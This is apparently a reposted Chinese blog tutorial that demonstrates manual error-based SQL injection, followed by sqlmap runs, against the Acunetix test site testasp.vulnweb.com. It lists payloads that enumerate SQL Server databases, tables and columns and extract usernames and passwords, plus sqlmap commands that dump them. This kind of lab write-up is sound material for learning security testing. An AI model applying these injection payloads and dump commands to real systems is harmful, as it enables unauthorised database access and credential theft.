记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

记一次sql server数据库手工注入

2016-04-25 15:25

 这次测试的站点是http://testasp.vulnweb.com/showthread.asp?id=3(ps:这是AWVs的一个官方测试站点)

20160125120459

http://testasp.vulnweb.com/showthread.asp?id=3-1   我们这次用-1来测试 返回成功

2016012512161820160125130619

http://testasp.vulnweb.com/showthread.asp?id=3+1 我们这次用+1来测试 很好出错了然后又用and 3=(select @@version) 查询了数据库版本Microsoft SQL Server 2005 – 9.00.3042.00 (Intel X86) (ps:如果你用注入工具测试 会显示那是mssql数据库 其实就是微软的sql server数据库)

20160125130619

然后用and 3=(select db_name()) 查看当前使用的数据库 ‘acuforum’

2016012513395020160125135103

and 3=(select top 1 name from master..sysdatabases where dbid>4and name <>’acublog’);

and 3=(select top 1 name from master..sysdatabases where dbid>4and name >’acuservice’);

列举下一个数据库    这里我就列举两个不一一列举了

20160125140807

and 3=(select top 1 name from sysobjects where xtype=’u’);第一张表threads

20160125142525

 

and 3=(select top 1 name from sysobjects where xtype=’u’ and name <> ‘threads’ and name’users’)第二张表 users

20160125143213

and 3=(select top 1 name from sysobjects where xtype=’u’ and name <> ‘threads’ and name <> ‘users’)第三张表frums

20160125151757

and 3=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’)) 第一个列名 uname

20160125152045

and 3=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’))第二个列名 upass

20160125152228

and 3=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’)and name<>’uname’ and name<>’upass’) 第三个列名 email

20160125154757

and 3=(select top 1 uname from users)貌似他这个用户名 手工猜不出来 好郁闷?( ̄? ̄)?

20160125155043

and 3=(select top 1 upass from users) 貌似 有点问题。。。。啊

用sqlmap跑下吧

20160125155455

20160125155510

 

sqlmap.py -u http://testasp.vulnweb.com/showthread.asp?id=3 如图有注入

20160125155525

继续sqlmap.py -u http://testasp.vulnweb.com/showthread.asp?id=3 –dbs列库

20160125155535

这里吧所有的都列出来 前两个 我们 刚才也试了

20160125155612

sqlmap.py -u http://testasp.vulnweb.com/showthread.asp?id=3 -D acublog –tables 列出acublog中的所有表

20160125155725

sqlmap.py -u http://testasp.vulnweb.com/showthread.asp?id=3 -D acublog -T users –columns 猜users表中的字段

20160125155739

20160125155916

sqlmap.py-u http://testasp.vulnweb.com/showthread.asp?id=3 -D acublog -T users -C uname,upass –dump  爆uname 和upass数据

20160125155926

确实有点 奇怪 恩  话说我手工爆的好像flag~~~

 

知识来源: www.2cto.com/Article/201604/502395.html

阅读:133730 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“记一次sql server数据库手工注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云